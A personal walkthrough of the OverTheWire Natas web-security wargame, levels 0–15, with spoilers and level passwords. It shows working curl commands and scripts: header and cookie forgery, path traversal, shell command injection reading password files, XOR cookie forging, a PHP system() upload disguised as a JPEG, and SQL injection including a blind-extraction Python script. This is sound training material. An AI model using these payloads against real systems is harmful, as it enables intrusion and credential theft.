# Natas

The following are the details for the
[Natas](https://overthewire.org/wargames/natas/) challenges.

**WARNING: These notes will contain spoilers and passwords!**

## Level 0

This one was simply to look at the source code of
[http://natas0.natas.labs.overthewire.org](http://natas0.natas.labs.overthewire.org),
which contained the password `g9D9cREhslqBKtcA2uocGHPfMZVzeFK6`.

## Level 1

Since right clicking was blocked, we can just bypass the browser all together
and use the terminal:
`curl -u 'natas1:g9D9cREhslqBKtcA2uocGHPfMZVzeFK6' 'http://natas1.natas.labs.overthewire.org/'`,
which gives us `h4ubbcXrWqsTo7GGnnUMLppXbOogfBZ7`.

## Level 2

Looking at the source there seemed to be a `pixel.png` file on the page. After
examining it and realizing there was nothing special, I went to the folder
itself (`http://natas2.natas.labs.overthewire.org/files/`), which had the file
`users.txt`, containing the pass `G6ctbMJ5Nb4cbFwhpMPSvxGHhQ7I6W8Q`.

## Level 3

The source this time mentioned "No more information leaks!! Not even **Google**
will find it this time...". This leads me to think of how search engines find
page information, which is usually through `robots.txt`. Surly enough when I go
to `http://natas3.natas.labs.overthewire.org/robots.txt`, I see there is a
disallow entry for `s3cr3t`. If we look at
`http://natas3.natas.labs.overthewire.org/s3cr3t/`, there is a `users.txt` file
that contains the password `tKOcJIbzM4lTs8hbCmzn5Zr4434fGZQm`.

## Level 4

The message that authorized users should come from
`http://natas5.natas.labs.overthewire.org/` leads me to believe we'll need a
custom request. A header entry exists that is called `Referer`, which is most
likely the value checked. So, we can mock one up with curl:

```bash
curl -u 'natas4:tKOcJIbzM4lTs8hbCmzn5Zr4434fGZQm'            \
     -H 'Referer: http://natas5.natas.labs.overthewire.org/' \
     'http://natas4.natas.labs.overthewire.org/'`
```

This gives us the password `Z0NsrtIkJoKALBCLi5eqFfcRN82Au2oD` in the response.

## Level 5

Nothing obvious popped out at first; however, when I ran it through a fresh
`curl` showing the response headers:
`curl -v -u 'natas5:Z0NsrtIkJoKALBCLi5eqFfcRN82Au2oD' 'http://natas5.natas.labs.overthewire.org/'`,
I saw a cookie called `loggedin=0`. Wondering what would happen if I sent this
back set to `1`:

```bash
curl -v -H 'Cookie: loggedin=1'                   \
     -u 'natas5:Z0NsrtIkJoKALBCLi5eqFfcRN82Au2oD' \
     'http://natas5.natas.labs.overthewire.org/'`
```

I got a nice little response with the password
`fOIvE0MDtPTgRhqmmvvAOt2EfXR6uQgR`.

## Level 6

Well, this one gave us a link to view the source, and it looks like the source
included a file called `secret.inc`. Heading over to
`http://natas6.natas.labs.overthewire.org/includes/secret.inc` gives the secret
key `FOEIUWGHFEEUHOFUOIU`, which when placed into the text box gives
`jmxSiH3SP6Sonf8dv66ng8v1cIEdjXWr` as the password.

## Level 7

Viewing the source code it looks like they say the password is in
`/etc/natas_webpass/natas8`. Considering this is a `php` page that gives
different text depending upon the page name passed to it (i.e.
`http://natas7.natas.labs.overthewire.org/index.php?page=home` and
`http://natas7.natas.labs.overthewire.org/index.php?page=about`), I'm going to
go out on a limb and say that the value for `page` is just a *filename*. Going
to
`http://natas7.natas.labs.overthewire.org/index.php?page=/etc/natas_webpass/natas8`
lets me know that I'm right, we get the pass `a6bZCNYwdKqN5cGP11ZdtPg0iImQQhAB`.

## Level 8

In this challenge two *encoded* strings are compared. Encoding a string **to**
the secret is done via: `text -> base64 -> reverse string -> binary -> hex`. So,
to take our secret `3d3d516343746d4d6d6c315669563362` and reverse it, we do:
`echo '3d3d516343746d4d6d6c315669563362' | xxd -r -p | rev | base64 -d`, which
gives us `oubWYf2kBq`. Passing that into the page, we get the password
`Sda6t0vkOPkM8YeOZkAGVhFoaplvlJFd`. Note that here `xxd` is taking the hex
string and dumping it as ASCII characters (effectively converting to binary and
then ASCII).

## Level 9

This one passes the input from the search through directly as a string to a grep
command. I'm going to assume this is evaluated in a shell and that I can trick
it using `;` to pass in my own command(s). Right now it's
`grep -i $key dictionary.txt`, but I can set `$key` to
`'' /dev/null; [my own command]; echo`. This will `grep` for nothing, then run
my custom command, then `echo` the dictionary files name. The passes for other
**OTW** challenges are in `/etc`, and running `'' /dev/null; ls /etc; echo`
show's there's a `natas_webpass` folder. So, running
`'' /dev/null; cat /etc/natas_webpass/natas10; echo` gives us the pass
`D44EcsFkLxPIkAAKLosx8z3hxX1Z4MCE`.

## Level 10

Here they added a *regex* filter for the characters `;`, `|`, and `&`. It uses
**PHP**'s `preg_match` function, which I assumed like many other regex functions
requires special handling of multi-line text. While the search box won't handle
escaped characters, we can manipulate the request by using the ASCII hex codes.
So using `curl`, we can do:

```bash
curl -u 'natas10:D44EcsFkLxPIkAAKLosx8z3hxX1Z4MCE' \
     'http://natas10.natas.labs.overthewire.org/?needle=''%20/dev/null%0acat%20/etc/natas_webpass/natas11%0aecho&submit=Search'`
```

This gives us the pass `1KFqoJXi6hRaPluAmk8ESDW4fSysRoIg`. Note that here `%20`
is hex for a *space* character, and `%0a` is hex for `\n` (new line/line feed).

## Level 11

I haven't heard much at all about *XOR* encryption; however, looking at the
[Wikipedia](https://en.wikipedia.org/wiki/XOR_cipher) article for it, it seems
the length of the string doesn't change and most of the string should stay the
same if a value were to change. In other words, right now the default is
`MGw7JCQ5OC04PT8jOSpqdmkgJ25nbCorKCEkIzlscm5oKC4qLSgubjY=` for a `bgcolor` of
`#ffffff`. Using a combination of a few different colors, we can kind of workout
the structure:

```text
#ffffff -> 0l;$$98-8=?#9*jvi 'ngl*+(!$#9lrnh(.*-(.n6
#aaaaaa -> 0l;$$98-8=?#9*jvi 'ngl*+(!$#9lrnh/)-*/)n6
#abcdef -> 0l;$$98-8=?#9*jvi 'ngl*+(!$#9lrnh/*//+.n6
```

So from here we can kind of gather that the first half is the `showpassword`
part of the *json* string, the `rnh` is `="#`, and the `n6` is `"}`. In other
words:

```text
0l;$$98-8=?#9*jvi 'ngl*+(!$#9lrnh [encoded-color-here] n6

{"showpassword" : "no", "bgcolor" : "[decoded-color-here]"}
```

or something like that... Anyway, writing a quick program to perform an *xor*
operation between the 3 different known values we get `NHLKNH`:

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int
main(void)
{
        size_t i;
        char key[32];
        const char *const ac = "ffffff", *const ap = "(.*-(.",
                   *const bc = "aaaaaa", *const bp = "/)-*/)",
                   *const cc = "abcdef", *const cp = "/*//+.";
        for (i = 0; i < 6; ++i)
                key[i] = ac[i] ^ ap[i];
        key[i] = '\0';
        printf("%s\n", key);
        for (i = 0; i < 6; ++i)
                key[i] = bc[i] ^ bp[i];
        key[i] = '\0';
        printf("%s\n", key);
        for (i = 0; i < 6; ++i)
                key[i] = cc[i] ^ cp[i];
        key[i] = '\0';
        printf("%s\n", key);
        return EXIT_SUCCESS;
}
```

So our proof of concept here works. Lets try expanding the strings to values we
know:

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int
main(void)
{
        size_t i;
        char key[32];
        const char *const ac = ":\"#ffffff\"}", *const ap = "rnh(.*-(.n6",
                   *const bc = ":\"#aaaaaa\"}", *const bp = "rnh/)-*/)n6",
                   *const cc = ":\"#abcdef\"}", *const cp = "rnh/*//+.n6";
        for (i = 0; i < strlen(ac); ++i)
                key[i] = ac[i] ^ ap[i];
        key[i] = '\0';
        printf("%s\n", key);
        for (i = 0; i < strlen(bc); ++i)
                key[i] = bc[i] ^ bp[i];
        key[i] = '\0';
        printf("%s\n", key);
        for (i = 0; i < strlen(cc); ++i)
                key[i] = cc[i] ^ cp[i];
        key[i] = '\0';
        printf("%s\n", key);
}
```

This gives us the key `HLKNHLKNHLK`. We know from the source code that the key
repeats, so after trying a few 4 character key values, we land on `KNHL`, which
gives us `{"showpassword":"no","bgcolor":"#ffffff"}`:

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int
main(void)
{
        size_t i;
        char ac[64];
        const char *const ap = "0l;$$98-8=?#9*jvi 'ngl*+(!$#9lrnh(.*-(.n6",
                   *const key = "KNHL";
        for (i = 0; i < strlen(ap); ++i)
                ac[i] = ap[i] ^ key[i % strlen(key)];
        printf("%s\n", ac);
        return EXIT_SUCCESS;
}
```

This means we can reverse this process, and encode the text
`{"showpassword":"yes","bgcolor":"#ffffff"}`:

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int
main(void)
{
        size_t i;
        char ap[64];
        const char *const ac =
              "{\"showpassword\":\"yes\",\"bgcolor\":\"#ffffff\"}",
              *const key ="KNHL";
        for (i = 0; i < strlen(ac); ++i)
                ap[i] = ac[i] ^ key[i % strlen(key)];
        printf("%s", ap);
        return EXIT_SUCCESS;
}
```

Which gives us the value `0l;$$98-8=?#9*jvi7-?ibj.,-' $<jvim.*-(.*i3`. If we
encode this as `base64` and send it over:

```bash
curl -vvv -u 'natas11:1KFqoJXi6hRaPluAmk8ESDW4fSysRoIg'                         \
     'http://natas11.natas.labs.overthewire.org'                                \
     -H 'Cookie: data=MGw7JCQ5OC04PT8jOSpqdmk3LT9pYmouLC0nICQ8anZpbS4qLSguKmkz'
```

We get the password `YWqo0pjpcXzSIl5NMAVxg12QxeC1w9QG`.

## Level 12

On this one I wasn't too sure where to go at first. I tried a few things, some
bad characters with the filename, I knew it had something to do with using my
own custom extension. Eventually down the rabbit hole I had the epiphany that if
I upload a *PHP* file, the system may interpret it. I don't really know much
PHP, but I know the box is a *Linux* box and that there had to be a `system`
command somewhere. So I placed the following in a script, ran it, and then went
to the uploaded file:

```bash
#!/bin/bash

rm -rf form.data

cat <<EOF>form.data
------WebKitFormBoundarymfSxKB6v7ZkBN1G2
Content-Disposition: form-data; name="MAX_FILE_SIZE"

1000
------WebKitFormBoundarymfSxKB6v7ZkBN1G2
Content-Disposition: form-data; name="filename"

testinga?file=pwn.php
------WebKitFormBoundarymfSxKB6v7ZkBN1G2
Content-Disposition: form-data; name="uploadedfile"; filename="test123.jpg"
Content-Type: image/jpeg

<html>
<head>
</head>
<body>
<div id="content">
<?php

system('cat /etc/natas_webpass/natas13')

?>
</div>
</body>
</html>

------WebKitFormBoundarymfSxKB6v7ZkBN1G2--
EOF

curl -vvv 'http://natas12.natas.labs.overthewire.org/index.php' \
     -u 'natas12:YWqo0pjpcXzSIl5NMAVxg12QxeC1w9QG'              \
     -H 'Connection: keep-alive'                                \
     -H 'Content-Type: multipart/form-data;
         boundary=----WebKitFormBoundarymfSxKB6v7ZkBN1G2'       \
     --data-binary @form.data

rm -rf form.data

exit 0
```

The password sent back was `lW3jYRI02ZKDBb8VtQBU1f6eDRo6WEj9`.

## Level 13

This one is basically the same as the previous, but it uses this
`exif_imagetype` function to check if it's a valid image file. The problem is
(when looking at the documentation), this function only checks for the *magic
signature*. To me, this tells me that I can probably inject the signature for a
*jpg* file **before** the PHP code and it'll pass the check. So modifying the
script and running it again:

```text
# ...
Content-Disposition: form-data; name="uploadedfile"; filename="test123.jpg"
Content-Type: image/jpeg

EOF

printf "\xff\xd8\xff" >>form.data

cat <<EOF>>form.data
<html>
<head>
# ...
```

We now get `qPazSJBmrmU7UQJv17MHk1PGC4DxZMEP`.

## Level 14

This one looks to be a form of *SQL* injection. They basically just run a count
on the number of returned rows when checking the username and password. If it
returns more than `0`, then you can log in. The query isn't sanitized, so when
you perform a normal request:

```bash
curl 'http://natas14.natas.labs.overthewire.org/index.php?username=test&'
      password=test&debug=1'                                              \
     -H 'Authorization: Basic 
         bmF0YXMxNDpxUGF6U0pCbXJtVTdVUUp2MTdNSGsxUEdDNER4Wk1FUA=='
```

it would generate the query
`SELECT * from users where username="test" and password="test"` (they were kind
enough to add a *debug* parameter for us....).

All we need to do is get this query to return more than 0 results, so in *SQL*
this would be done like:
`select * from users where username="test" and password="test" or 1 password="`.
In their code, they add a `"` for you at the end of the password in the query
string, so we also have to add a dummy condition `password="` here. To do this
in `curl` (replacing *spaces* with `%20`):

```bash
curl 'http://natas14.natas.labs.overthewire.org/index.php?username=&'
      password="%20or%201%20or%20password="&debug=1'                  \
     -H 'Authorization: Basic 
         bmF0YXMxNDpxUGF6U0pCbXJtVTdVUUp2MTdNSGsxUEdDNER4Wk1FUA=='
```

This gives us the password `TTkaI7AWG4iDERztBcEyKV7kRXH1EZRB`.

## Level 15

I honestly had to think a lot about this one for some reason. I eventually just
gave in and figured I'd have to *brute force* it some way. I know that in *SQL*
we can simply check the `password` column, but that would take quite a while. We
also have the `LEFT` keyword that would allow us to check the first character of
`password`, and thus after that the others as well. This would effectively allow
us to check each character individually. This is important since All the
passwords so far have been `a-z`, `A-Z`, and `0-9`. We know if the user exists
(or the query is successful), we get the text "This user exists.". Shell might
be a little slow for this so we're gonna roll a Python script:

```python
import urllib.request

def make_request(ch):
    req = urllib.request.Request(
        f'http://natas15.natas.labs.overthewire.org/index.php?username=natas16"%20and%20LEFT(password,1)="{ch}&debug=1')
    req.add_header(
        'Authorization', 'Basic bmF0YXMxNTpUVGthSTdBV0c0aURFUnp0QmNFeUtWN2tSWEgxRVpSQg==')
    with urllib.request.urlopen(req) as page:
        if page.status != 200:
            raise Exception(f"invalid status code {page.status} returned")
        return page.read().decode('utf-8').find("This user exists.") != -1


for ch in "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ":
    if make_request(ch):
        print(ch)
```

This gave us the output:

```text
        t
        T
```

Which is good news, only one letter was matched, which was `t`. The only problem
is both lower and upper case returned, which apparently the `LEFT` function
requires *collation* to be set. I tried doing this a few different ways and
failed, but thought maybe if we converted the value to another type maybe we
could compare. It seems there is a `BINARY` keyword in SQL that we could use to
cast the value, trying this, we get:

```text
        T
```

There we go, now we have only one character. If we rewrite this script to
account for more characters:

```python
import urllib.request


def make_request(passwd):
    req = urllib.request.Request(
        f'http://natas15.natas.labs.overthewire.org/index.php?username=natas16"%20and%20BINARY%20LEFT(password,{len(passwd)})="{passwd}&debug=1')
    req.add_header(
        'Authorization', 'Basic bmF0YXMxNTpUVGthSTdBV0c0aURFUnp0QmNFeUtWN2tSWEgxRVpSQg==')
    with urllib.request.urlopen(req) as page:
        if page.status != 200:
            raise Exception(f"invalid status code {page.status} returned")
        res = page.read().decode('utf-8')
        return res.find("This user exists.") != -1


found = True
passwd = ""
pos = 1

while found:
    found = False
    for ch in "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ":
        tmp = passwd + ch
        if make_request(tmp):
            passwd = tmp
            found = True
            print(f"Found so far: {passwd}")
            break
```

We get:

```text
Found so far: T
Found so far: TR
Found so far: TRD
...
Found so far: TRD7iZrd5gATjj9PkPEuaOlfEjHqj3
Found so far: TRD7iZrd5gATjj9PkPEuaOlfEjHqj32
Found so far: TRD7iZrd5gATjj9PkPEuaOlfEjHqj32V
```

Thus our password is `TRD7iZrd5gATjj9PkPEuaOlfEjHqj32V`.

## Level 16
